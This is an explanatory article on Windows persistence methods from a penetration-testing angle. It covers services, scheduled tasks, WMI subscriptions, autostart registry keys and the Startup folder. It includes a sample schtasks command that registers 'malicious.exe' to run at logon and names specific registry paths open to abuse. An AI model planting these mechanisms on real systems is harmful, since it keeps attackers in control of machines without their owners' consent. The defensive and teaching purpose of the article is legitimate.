Understanding Persistence Techniques in Penetration Testing

Why Persistence Matters

Maintaining access to a system after gaining initial entry is crucial for attackers. If defenders reboot the system or apply security measures, persistence techniques allow continued control. There are several ways to achieve this, each with unique advantages.

Common Methods of Persistence

Windows Services

Windows services run in the background without requiring user interaction, making them a reliable choice for persistence. Attackers can install a malicious service configured to start automatically.

Why Services Are Effective:

• Start at boot without user action

• Run continuously in the background

• Can execute with SYSTEM privileges

• Use Case: Attackers create a disguised service to maintain persistent access with elevated privileges, even if the user logs out or the system restarts.

Scheduled Tasks

Windows Task Scheduler enables the automation of tasks, which can be leveraged for persistence.

Example Command:

schtasks /create /tn "UpdateService" /sc onlogon /tr "malicious.exe"

Key options:

• Execution frequency: MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE

• Trigger events: ONSTART, ONLOGON, ONIDLE

• Privilege escalation: Can run as SYSTEM for higher access levels

• Use Case: Attackers schedule a hidden task that runs at every login to maintain access without user interaction.

Scheduled tasks ensure execution at defined intervals or system events, making them an effective method.

WMI Event Consumers

Windows Management Instrumentation (WMI) allows attackers to create event-based persistence by triggering actions based on system events.

Why WMI is Useful for Persistence:

• Runs with SYSTEM privileges

• Can trigger execution based on system events

• Difficult to detect using conventional security tools

• Use Case: Attackers create a WMI event subscription that executes a payload whenever a specific system event occurs, such as a user logging in or a network connection being established.

Registry Modifications

The Windows registry is a key location for attackers to maintain access. Since it stores configuration details for the OS and applications, it can be manipulated for persistence.

Notable Registry Keys for Persistence:

• Run and RunOnce Keys:
  • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
  • Use Case: Attackers place malicious scripts here to execute every time the user logs in, ensuring continued access.
• CMD AutoRun Key:
  • HKCU\Software\Microsoft\Command Processor\AutoRun
  • Use Case: A command-line script is configured to run each time CMD.EXE is launched, allowing attackers to execute commands persistently.
• HKCU Load Key:
  • HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows
  • Use Case: Attackers leverage this key to load a malicious executable whenever the user logs in, often bypassing security tools that focus on startup folders or registry Run keys.

These keys allow automatic execution of commands at login or system startup.

Startup Folder Exploitation

Another approach that avoids registry modifications is placing malicious files in the startup directory. Any executable, script, or link in this folder runs automatically when the user logs in.

Location:

%AppData%\Microsoft\Windows\Start Menu\Programs\Startup

• Use Case: Attackers drop a payload in this folder to execute malware whenever the user logs in, ensuring persistence across reboots.

This technique is particularly useful in virtual desktop environments where user profiles are reset frequently, ensuring execution upon every new session.

Conclusion

Understanding these persistence techniques is essential for both attackers and defenders. While penetration testers use them to evaluate security postures, blue teams must recognize and mitigate these risks to maintain system integrity.